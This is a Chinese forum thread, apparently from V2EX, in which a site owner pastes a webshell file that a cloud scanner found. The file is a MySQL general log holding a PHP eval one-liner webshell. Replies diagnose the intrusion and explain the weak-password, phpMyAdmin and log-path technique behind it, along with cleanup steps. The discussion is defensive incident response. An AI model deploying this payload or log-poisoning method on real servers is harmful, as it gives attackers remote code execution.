阿里云云盾检测到发现后门 webshell 根目录多了一个 wuwu11.php 的文件, 内容是:
D:\web\phpStudy\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time Id Command Argument
65264 Init DB mysql
65264 Query SHOW TABLES FROM `mysql`
65264 Query SHOW TABLE STATUS FROM `mysql`
65264 Query SELECT CURRENT_USER()
65264 Query SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='EVENT'
65264 Query SELECT CURRENT_USER()
65264 Query SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='TRIGGER'
65264 Quit
180330 19:55:36 65265 Connect root@localhost on
65265 Query SET NAMES 'utf8' COLLATE 'utf8_general_ci'
65265 Init DB mysql
65265 Init DB mysql
65265 Query select '<?php @eval($_POST[h])?>'
65265 Init DB mysql
65265 Query SHOW TABLES FROM `mysql`
65265 Query SHOW TABLE STATUS FROM `mysql`
65265 Query SELECT CURRENT_USER()
65265 Query SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='EVENT'
65265 Query SELECT CURRENT_USER()
65265 Query SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='TRIGGER'
65265 Query SHOW TABLES
65265 Quit
180330 19:55:37 65266 Connect root@localhost on
65266 Query SET NAMES 'utf8' COLLATE 'utf8_general_ci'
65266 Init DB mysql
65266 Init DB mysql
65266 Query set global general_log = 'Off'
1
111111111111 2018-03-31 09:17:27 +08:00 via Android
注入漏洞吧,服务器权限也没设置
|
3
wukaichao 2018-03-31 09:25:17 +08:00 via iPhone
注入吧,直接在读表了。
|
4
kuzhan 2018-03-31 09:26:33 +08:00 via Android
都脱裤了 还问
|
5
zjsxwc 2018-03-31 09:29:20 +08:00
|
8
janus77 2018-03-31 12:46:36 +08:00 via Android
哈哈哈哈哈
|
9
sinver 2018-03-31 12:52:07 +08:00
phpmyadmin 及各种弱口令.....感觉重装系统 及重新搭建网站和权限控制吧....
|
11
lifeintools 2018-03-31 14:05:00 +08:00
还有网站源码。。你还不设置权限。。。。。
|
12
xuyl 2018-03-31 20:24:01 +08:00
php 码农安全意识堪忧啊。
|
13
Tink 2018-03-31 23:22:25 +08:00 via iPhone
惨
|
14
fanglongzong 2018-04-06 10:16:42 +08:00
跟楼主一模一样的情况。
完全是技术小白,不知道要怎么办…… |
15
maoxs2 2018-08-20 15:51:16 +08:00
1. 不是我搞得,只是碰巧碰见了这个后门好几回
2. 攻击点是 MySQL 弱密码+phpMyAdmin 3. 注入点是日志文档保存路径修改至 apache 服务器解析文件夹(通过 phpinfo 获得 /phpstudy 等框架猜解) 4. 解决方法删除它后续步骤放的别的后门程序( exe+服务),删除 wuwu11,修改 MySQL 弱密码,删掉 phpMyAdmin 或者修改路径或者加 http 认证啥的 |